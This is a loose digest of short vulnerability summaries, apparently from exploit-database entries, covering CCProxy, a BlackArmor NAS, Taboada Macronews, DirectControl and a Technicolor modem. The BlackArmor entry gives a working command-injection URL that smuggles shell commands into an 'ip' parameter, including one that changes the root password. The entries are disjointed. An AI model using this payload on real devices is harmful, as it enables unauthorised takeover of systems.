CCProxy v7.3 is vulnerable to an integer overflow caused by improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted .ini file to the vulnerable application. This will cause a buffer overflow, allowing the attacker to execute arbitrary code on the target system.
When adding a user to the device, it is possible to enter a full name. This input field does not sanitize its input and it is possible to enter any payload which will get executed upon reload. The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input field does not sanitize its input.
Multiple CSRF attacks are possible; the proof of concept shows how to add a user with administrative privileges to the system. It is also possible to factory reset the device, reboot the device, add/edit/remove users, and add/edit/remove shares and volumes.
The file getAlias.php located in /backupmgt has the following lines:
    // $ipAddress is taken from the query string and interpolated into a shell command unsanitized
    $ipAddress = $_GET["ip"];
    if ($ipAddress != "") {
        exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
        ..
        ..
    }
The GET parameter can easily be manipulated to execute commands on the BlackArmor system.
Proof of Concept:
    http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your command here>;
Example to change the root password to 'mypassword':
    http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo 'mypassword' | passwd --stdin;
This exploit consists of a class, MD5Decryptor, which is used to decrypt the MD5 hash. Its subclass MD5DecryptorWeb gets the wordlist from the URL, and its subclass MD5DecryptorGoogle gets the wordlist from Google. It also has a function, portcheck, which is used to check the port of the host.
Taboada Macronews <= 1.0 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The exploit is achieved by sending malicious SQL queries to the vulnerable application. The attacker can use the LOAD_FILE() function to read files from the server.
POSTing a bad login page parameter causes the router to reboot.
A vulnerability in DirectControl™ Version 3.1.7.0 allows an attacker to extract the version, database, and username and password via POST string MSSQL injection.
Multiple XSS vulnerabilities exist in Technicolor TC7200. A persistent XSS vulnerability exists in the 'WebFilteringdomainMode' parameter of the 'website-filters.asp' page, and a reflected XSS vulnerability exists in the 'VmTracerouteHost' parameter of the 'diagnostics-route' page. An attacker can exploit these vulnerabilities by sending a maliciously crafted request to the vulnerable page.
Multiple CSRF vulnerabilities exist in the Technicolor TC7200 modem. An attacker can exploit these vulnerabilities to perform a factory reset, disable the advanced options, remove IP filters, and remove firewall settings. No authentication is required to exploit these vulnerabilities.